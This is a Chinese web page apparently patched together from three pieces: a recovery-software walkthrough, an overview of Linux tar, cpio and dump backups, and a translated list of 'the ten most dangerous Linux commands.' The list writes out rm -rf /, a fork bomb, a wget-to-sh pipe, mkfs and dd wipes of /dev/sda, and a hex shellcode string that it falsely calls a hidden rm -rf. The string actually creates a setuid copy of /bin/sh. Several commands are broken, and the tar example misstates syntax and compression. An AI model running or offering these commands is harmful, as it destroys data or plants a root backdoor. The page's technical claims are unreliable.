linux服务器数据恢复 Linux服务器数据丢失的恢复方法

虽说现在很多的用户都在使用windows服务器，但是，对于一些企业来说，还是更为喜欢用Linux服务器。不过，不管是使用何种服务器，都有可能会出现数据丢失的情况的。

导致出现服务器数据丢失的情况是有很多的，一些常用的情况有误删除文件、误格式化文件、误重装系统、黑客病毒等，而出现这些情况的话，我们可以借助数据恢复软件来进行数据恢复。以下是顶尖数据恢复软件的使用教程：

1、用户首先需要下载安装顶尖数据恢复软件。

2、安装好后，双击打开软件，软件界面如下：

3、通过软件界面，能够看到有六个功能模块，用户可以将鼠标移动到模块上，查看该模块的功能，根据实际情况进行选择，若是无法确定，即可直接点击“万能恢复”。

4、之后选择需要恢复的分区或者是物理设备，再点击“下一步”。

5、软件将对该分区进行扫描，全盘扫描所需要的时间会比较长，耐性等待即可。

6、在扫描结果中，勾选出自己想要恢复的数据，点击“下一步”。

7、为恢复出来的文件选择一个新的存储路径，点击“下一步”即可开始恢复。

Linux服务器数据丢失，通过该方法，即能够恢复数据。平时最好还是将重要的文件进行备份处理，这样在遇到数据丢失的情况的话，也不至于太过慌乱。

怎么恢复备份wenjian linux

本文讲述Linux环境下，如何使用备份的脚本和命令以及商业化的软件来合理高效地保护磁盘数据安全。

备份与恢复系统承担着事前备份与事后恢复的职能。在当前高速发展的网络环境下，任何一个网络上的信息 系统都不可能保证绝对的安全。只要有网络存在，就会有来自网络的形形色色的威胁。为了抵御网络的攻击和入侵，虽然我们引入了日趋成熟的入侵检测系统、防火墙系统等，黑客们的入侵手段也日益高明，他们总能找到这些系统的安全漏洞及不足进行入侵，因而网络入侵所引起的安全事件呈逐年增加之势。

在这种情况下，我们难以保证网络中关键系统的绝对安全，因而就需要采用备份及恢复技术。备份及恢复技术就是使用存储介质和一定的策略，定期将系统业务数据备份下来，以保证数据意外丢失时能尽快恢复，将用户的损失降到最低点。它是信息安全学科中一种非常重要的核心技术。

Linux下的备份技术

对于备份和恢复来说，Linux提供了诸如tar、cpio、 dump等工具来实现。这样，用户无需花钱购买，便可根据系统的实际情况，结合使用相应的备份恢复工具实现备份与恢复的基本功能。

tar工具介绍

tar是一个已移植到 Linux 中的经典 Unix 命令。 tar 是 tape archive（磁带归档）的缩写，最初设计用于将文件打包到磁带上，现在我们大都使用它来实现备份某个分区或者某些重要的文件目录。我们使用 tar 可以打包整个目录树，这使得它特别适合用于备份。归档文件可以全部还原，或从中展开单独的文件和目录。备份可以保存到基于文件的设备或磁带设备上。文件可以在还原时重定向，以便将它们重新放到一个与最初保存它们的目录（或系统）不同的目录（或系统）。tar是与文件系统无关的，因而它的适用范围很广，它可以使用在ext2、ext3、jfs、Reiser和其他文件系统上。

使用tar非常类似于使用诸如Windows环境下的Winzip、WinRAR这样的文件实用工具。只需将它指向一个目的（可以是文件或设备），然后指定想要打包的文件，就可以通过标准的压缩类型来动态压缩归档文件，或指定一个自己选择的外部压缩程序。要通过bzip2压缩或解压缩文件，可使用tar -z命令。

下面是一个简单的使用该工具进行数据备份的例子：

tar czvf - /root/code /tmp/code_bak.tgz （将/root/code目录下的所有程序文件打包备份到/tmp/code_bak.tgz）

tar xzvf /tmp/code_bak.tgz /root/code （将备份的目录文件恢复到指定目录）

cpio工具介绍

cpio命令可以从tar或者cpio档案文件中拷入或者拷出文件。cpio命令和tar命令兼容，但是这个命令具备一些tar命令没有的功能，如下所示：

● 支持cpio和tar两种档案文件格式；

● 支持许多老式磁带数据格式；

● 能够通过一个管道(pipe-line)读取文件的文件名。

目前看来，只有很少的Linux软件包是以cpio格式发行的。用户如果对cpio命令的详细情况感兴趣，可以通过“man cpio ”命令阅读它的使用手册。 　

dump 和 restore介绍

dump可以执行类似tar的功能。然而，dump倾向于考虑文件系统而不是个别的文件。dump检查ext2文件系统上的文件，并确定哪些文件需要备份。这些文件将出于安全保护而被复制到给定的磁盘、磁带或其他存储媒体上。在大多数媒体上，容量是通过一直写入直至返回一个end-of-media标记来确定的。

配合dump的程序是restore，它用于从转储映像还原文件。restore命令执行转储的逆向功能。可以首先还原文件系统的完全备份，而后续的增量备份可以在已还原的完全备份之上覆盖。可以从完全或部分备份中还原单独的文件或者目录树。

dump和restore都能在网络上运行，因此用户可以通过远程设备进行备份或还原。dump和restore使用磁带驱动器和提供广泛选项的文件设备。然而，两者都仅限用于ext2和ext3文件系统。如果使用的是JFS、Reiser或者其他文件系统，将需要其他的实用工具，比如 tar。 举个例子：

dump 0f /dev/nst0 /（将ext2文件系统备份到第一个SCSI设备）

restore -xf /dev/nst0 /home/code（将备份的SCSI设备中的/home/code目录下的所有数据还原到磁盘）

另外，现在市场上还存在着诸如Tivoli Storage Manager之类的商业化存储备份工具，这些都是可视化的工具，用户可以方便地通过用户界面来实现备份与恢复。值得注意的是，这是一款商业软件，因而并不是免费的，对于很多用户来说，它所提供的功能与我们上述的Linux自带的备份与恢复工具比较相似，只是更加人性化和友好，使用户从枯燥的命令行方式下摆脱出来，从而方便用户使用。 　

备份需要花费一定量的物力和财力，如何在备份所取得的收益与备份消耗的资源上做一个权衡是网络安全工作者需要考虑的一个大问题，因为支出大于产出也就意味着低效甚至失败。所以在Linux环境中进行数据备份，需要根据实际情况进行区分对待，以取得比较好的效果。特别是，需要对一些关键的目录进行区分，从而做到有针对性的备份，减少不必要的浪费。

一般情况下，以下所列目录是需要备份的，它们在系统中具有举足轻重的地位：/etc包含所有核心配置文件，这其中包括密码文件、网络配置文件、系统名称、防火墙规则、NFS文件系统配置文件以及其他全局系统项；/var包含系统守护进程（服务）所使用的信息，包括 DNS 配置、DHCP 租期、邮件缓冲文件、HTTP 服务器文件等；/home包含所有用户的默认用户主目录，这包括他们的个人设置、已下载的文件和用户存放在系统中的重要的信息；/root是根（root）用户的主目录；/bin是存放许多系统中常用的诸如ls、ps等命令的重要场所，这些命令在磁盘上均有影响，极容易遭受黑客的破坏。

相反地，在Linux系统中，如下目录是不应该备份的：/proc永远不需要备份，它不是一个真实的文件系统，而是运行内核和环境的虚拟化视图，它包括诸如 /proc/cpuinfo、/proc/meminfo 这样的文件，这个文件是整个运行内存的虚拟视图，一旦系统关机或者重新启动，该目录下的信息便不复存在；/dev包含硬件设备的文件表示，如果计划还原到一个空白的系统，那就可以备份 /dev，如果计划还原到一个已安装的Linux系统，那么备份/dev 是没有必要的；另外，一些软链接（也就是指向另外一些磁盘文件的文件）是不需要备份的，因为这些文件当中存储的只是被指向文件的地址，这些软链接文件，用户可以通过使用“ls -l”命令来判定，如下所示，其中linux-2.4即为一个软链接文件，它指向的是linux-2.4.7-10这个目录。

Linux中最危险的10个命令

Linux中最危险的10个命令

对于编程人员或或者Linux系统管理员来说，操作Linux系统最常见的方法就是使用命令行。当然，Linux命令行佷有用、很高效，但有时候也很危险，尤其是在你误操作或者不确定你自己在正在做什么的时候。下面我就为大家盘点最危险是10个命令，一起来看看吧!

当然，以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下，破坏的只是自己的一亩三分地。

1. rm -rf 命令

rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。

rm　命令在Linux下通常用来删除文件。

rm -r 命令递归的删除文件夹，甚至是空的文件夹。(译注：个人认为此处应该是说错了，从常识看，应该是“甚至是非空的文件夹”)

rm -f 命令能不经过询问直接删除‘只读文件’。(译注：Linux下删除文件并不在乎该文件是否是只读的，而只是在意其父目录是否有写权限。所以，-f这个参数 只是表示不必一个个删除确认，而是一律悄悄删除。另外，原始的rm命令其实也是没有删除提示的，只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认，而-f则抑制了这个提示。)

rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后，什么也没有了。。。)

rm -rf *:　强制删除当前目录的所有文件。

rm -rf . : 强制删除当前文件夹及其子文件夹。

从 现在起，当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名，来预防用 ‘rm‘命令删除文件时的事故，它会要求你确认每一个删除请求。(译注：大多数发行版已经这样做了，如果还没有，请这样做，并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊。)

2. :(){:|:};: 命令

这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:};:

哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~

3. 命令　 /dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4. mv 文件夹 /dev/null

这 个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写操作成功。(译注：这就是黑洞啊。当然，要说明的是，通过将文件夹移动到黑洞，并不能阻止 数据恢复软件的救赎，所以，真正的`彻底毁灭，需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)

# mv /home/user/* /dev/null

上列命令会将User目录所有内容移动到/dev/null，这意味着所有东西都被‘卷入’黑洞　(null)之中。

5. wget -O- | sh

上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本，而sh会(无条件的)执行下载下来的脚本。

注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注：所以，你真的知道你在做什么吗?当遇到这种需要是，我的做法是，先wget下来，然后我去读一读其中到底写了些什么，然后考虑是否执行。)

6. mkfs.ext3 /dev/sda

上列命令会格式化块设备‘sda’，你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化，崭新的!没有任何数据，直接让你的系统达到不可恢复的阶段。(译注：通常不会直接使用/dev/sda这样的设备，除非是作为raw设 备使用，一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然，无论你使用sda还是sda1，这样对块设备或分区进行mkfs都是毁 灭性的，上面的数据都会被蒸发了。)

7. file

上列命令常用来清空文件内容(译注：通常也用于记录命令输出。 不过请在执行前，确认输出的文件是空的或者还不存在，否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外，我想你可能真正想用的是 “”，即累加新的输出到文件，而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “xt.conf”　的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令在“鲜为人知而又实用的 Linux 命令大全：”中描述过，用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。(译注：事实上，这种小技巧是译者认为的，少数史前时代遗留下来的无用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注：记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见，你可以覆写多次。)

10. 隐藏命令

下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。

这个命令表明通常真正的危险是隐藏的，不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令，因为这将导致数据丢失或者系统崩溃。如果你想测试它们，请在虚拟机上运行。

;